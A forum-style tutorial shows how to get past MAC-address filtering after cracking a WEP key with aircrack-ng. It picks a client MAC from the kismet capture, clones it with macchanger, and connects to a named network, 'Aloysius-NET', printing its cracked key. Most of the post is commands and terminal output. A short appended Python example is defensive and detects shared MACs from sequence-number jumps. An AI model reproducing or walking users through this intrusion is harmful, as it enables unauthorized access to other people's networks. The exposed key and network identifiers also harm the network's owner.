WEP key problem [SOLVED]
my machine
ubuntu 9.10
linksys wusb54g ver 4
chipset ralink 2570
aircrack-ng 1.1
i have a problem with the WEP key..
after i crack the IVs with aircrack-ng, the key is found! but i can't connect to the access point.
the access point keeps asking me for the WEP key.
the key is correct! what's wrong then?
the access point filters by mac address! only a client mac address can connect to it.
so the solution is to use a client mac address! ^_^
if you remember the client mac, then change your mac to the client mac.
what is client mac address?
the client mac address is the mac address that you're spoofing with aireplay-ng.
aireplay-ng -3 -b -h
i forgot client mac address.. -___-
if you start capturing replies, there are 4 files created.
-rw-r--r-- 1 root root 86179840 2011-07-03 01:08 qwe-01.cap
-rw-r--r-- 1 root root 769 2011-07-03 01:08 qwe-01.csv
-rw-r--r-- 1 root root 591 2011-07-03 01:08 qwe-01.kismet.csv
-rw-r--r-- 1 root root 5711 2011-07-03 01:08 qwe-01.kismet.netxml
now search for the client mac address in the qwe-01.kismet.netxml file.
find a client with a big packet count.
root@evilc0de:/home/noge# cat qwe-01.kismet.netxml
---cut---
---cut---
the packet count is big enough: 69983
yey!! i found my client: 4C:0F:6E:60:25:AC .. :))
check your interface..
my interface is wlan3 and my default mac address is 00:1d:7e:09:6b:0a.
we need to change the default mac <00:1d:7e:09:6b:0a> to the client mac <4C:0F:6E:60:25:AC>
root@evilc0de:/home/noge# ifconfig wlan3
wlan3 Link encap:Ethernet HWaddr 00:1d:7e:09:6b:0a
inet6 addr: fe80::21d:7eff:fe09:6b0a/64 Scope:Link
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:15 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:3816 (3.8 KB)
if we run iwconfig we can see no connection there.
Access Point: Not-Associated
Encryption key:off
root@evilc0de:/home/noge# iwconfig wlan3
wlan3 IEEE 802.11bg Mode:Managed Frequency:2.457 GHz
Access Point: Not-Associated Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
let's change our mac!
first i'll set my interface down so i can change the mac address.
root@evilc0de:/home/noge# ifconfig wlan3 down
now change the mac with macchanger.
root@evilc0de:/home/noge# macchanger -m 4C:0F:6E:60:25:AC wlan3
Current MAC: 00:1d:7e:09:6b:0a (unknown)
Faked MAC: 4c:0f:6e:60:25:ac (unknown)
bring it up again..
root@evilc0de:/home/noge# ifconfig wlan3 up
as you can see below, my mac address has changed to 4c:0f:6e:60:25:ac.
root@evilc0de:/home/noge# ifconfig wlan3
wlan3 Link encap:Ethernet HWaddr 4c:0f:6e:60:25:ac
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:15 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:3816 (3.8 KB)
now try to connect with the access point.
voila!! it's connected.. ^___^
ESSID:"Aloysius-NET"
Access Point: 00:02:6F:54:04:75
Encryption key:0987-6123-45
root@evilc0de:/home/noge# iwconfig wlan3
wlan3 IEEE 802.11bg ESSID:"Aloysius-NET"
Mode:Managed Frequency:2.462 GHz Access Point: 00:02:6F:54:04:75
Bit Rate=1 Mb/s Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:0987-6123-45
Power Management:on
Link Quality=40/70 Signal level=-70 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
ping test..
root@evilc0de:/home/noge# ping antisecurity.org
PING antisecurity.org (168.144.82.176) 56(84) bytes of data.
64 bytes from 168.144.82.176: icmp_seq=1 ttl=56 time=740 ms
64 bytes from 168.144.82.176: icmp_seq=2 ttl=56 time=1082 ms
64 bytes from 168.144.82.176: icmp_seq=3 ttl=56 time=778 ms
64 bytes from 168.144.82.176: icmp_seq=4 ttl=56 time=797 ms
64 bytes from 168.144.82.176: icmp_seq=6 ttl=56 time=711 ms
^Z
[8]+ Stopped ping antisecurity.org
root@evilc0de:/home/noge#
so if you have the WEP key but can't connect to the access point, try changing your mac to the client mac.
big thanks to bob and array
salam from papua.. :)
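Seen from the access point's side (an added example, not part of the original post): a mac filter cannot tell a cloned adapter from the real client, but each radio keeps its own 12-bit 802.11 sequence counter, so two radios sharing one address produce interleaved, jumping sequence numbers. The frame tuples, the thresholds and the 02:00:00:00:00:01 address are constructed for illustration, and the per-TID counters of QoS frames are ignored.

```python
from collections import defaultdict

SEQ_MOD = 4096  # 802.11 sequence numbers are 12 bits and wrap at 4096


def seq_gap(prev, cur):
    """Forward distance from prev to cur, allowing for wrap-around."""
    return (cur - prev) % SEQ_MOD


def find_shared_macs(frames, max_gap=64, min_anomalies=3):
    """Return {mac: anomaly_count} for transmitter addresses whose sequence
    numbers jump in a way a single radio would not produce.

    frames: iterable of (timestamp, transmitter_mac, seq_num), in any order.
    max_gap and min_anomalies are assumed thresholds; tune them per site.
    """
    last_seq = {}
    anomalies = defaultdict(int)
    for _, mac, seq in sorted(frames):
        mac = mac.lower()
        if mac in last_seq:
            gap = seq_gap(last_seq[mac], seq)
            # gap 0 is a retransmission, a small gap is frames the sensor
            # missed; a large gap means a second counter is in play
            if gap > max_gap:
                anomalies[mac] += 1
        last_seq[mac] = seq
    return {m: n for m, n in anomalies.items() if n >= min_anomalies}


def build_sample():
    """Constructed capture: one address used by two radios, one clean client."""
    frames, t = [], 0.0
    for i in range(6):
        frames.append((t, "4C:0F:6E:60:25:AC", 100 + i))   # original client
        t += 0.01
        frames.append((t, "4c:0f:6e:60:25:ac", 3000 + i))  # second radio, same mac
        t += 0.01
        # clean client whose counter wraps 4095 -> 0 during the capture
        frames.append((t, "02:00:00:00:00:01", (4093 + i) % SEQ_MOD))
        t += 0.01
    return frames


if __name__ == "__main__":
    for mac, count in find_shared_macs(build_sample()).items():
        print(f"{mac}: {count} sequence jumps, address is likely shared")
```
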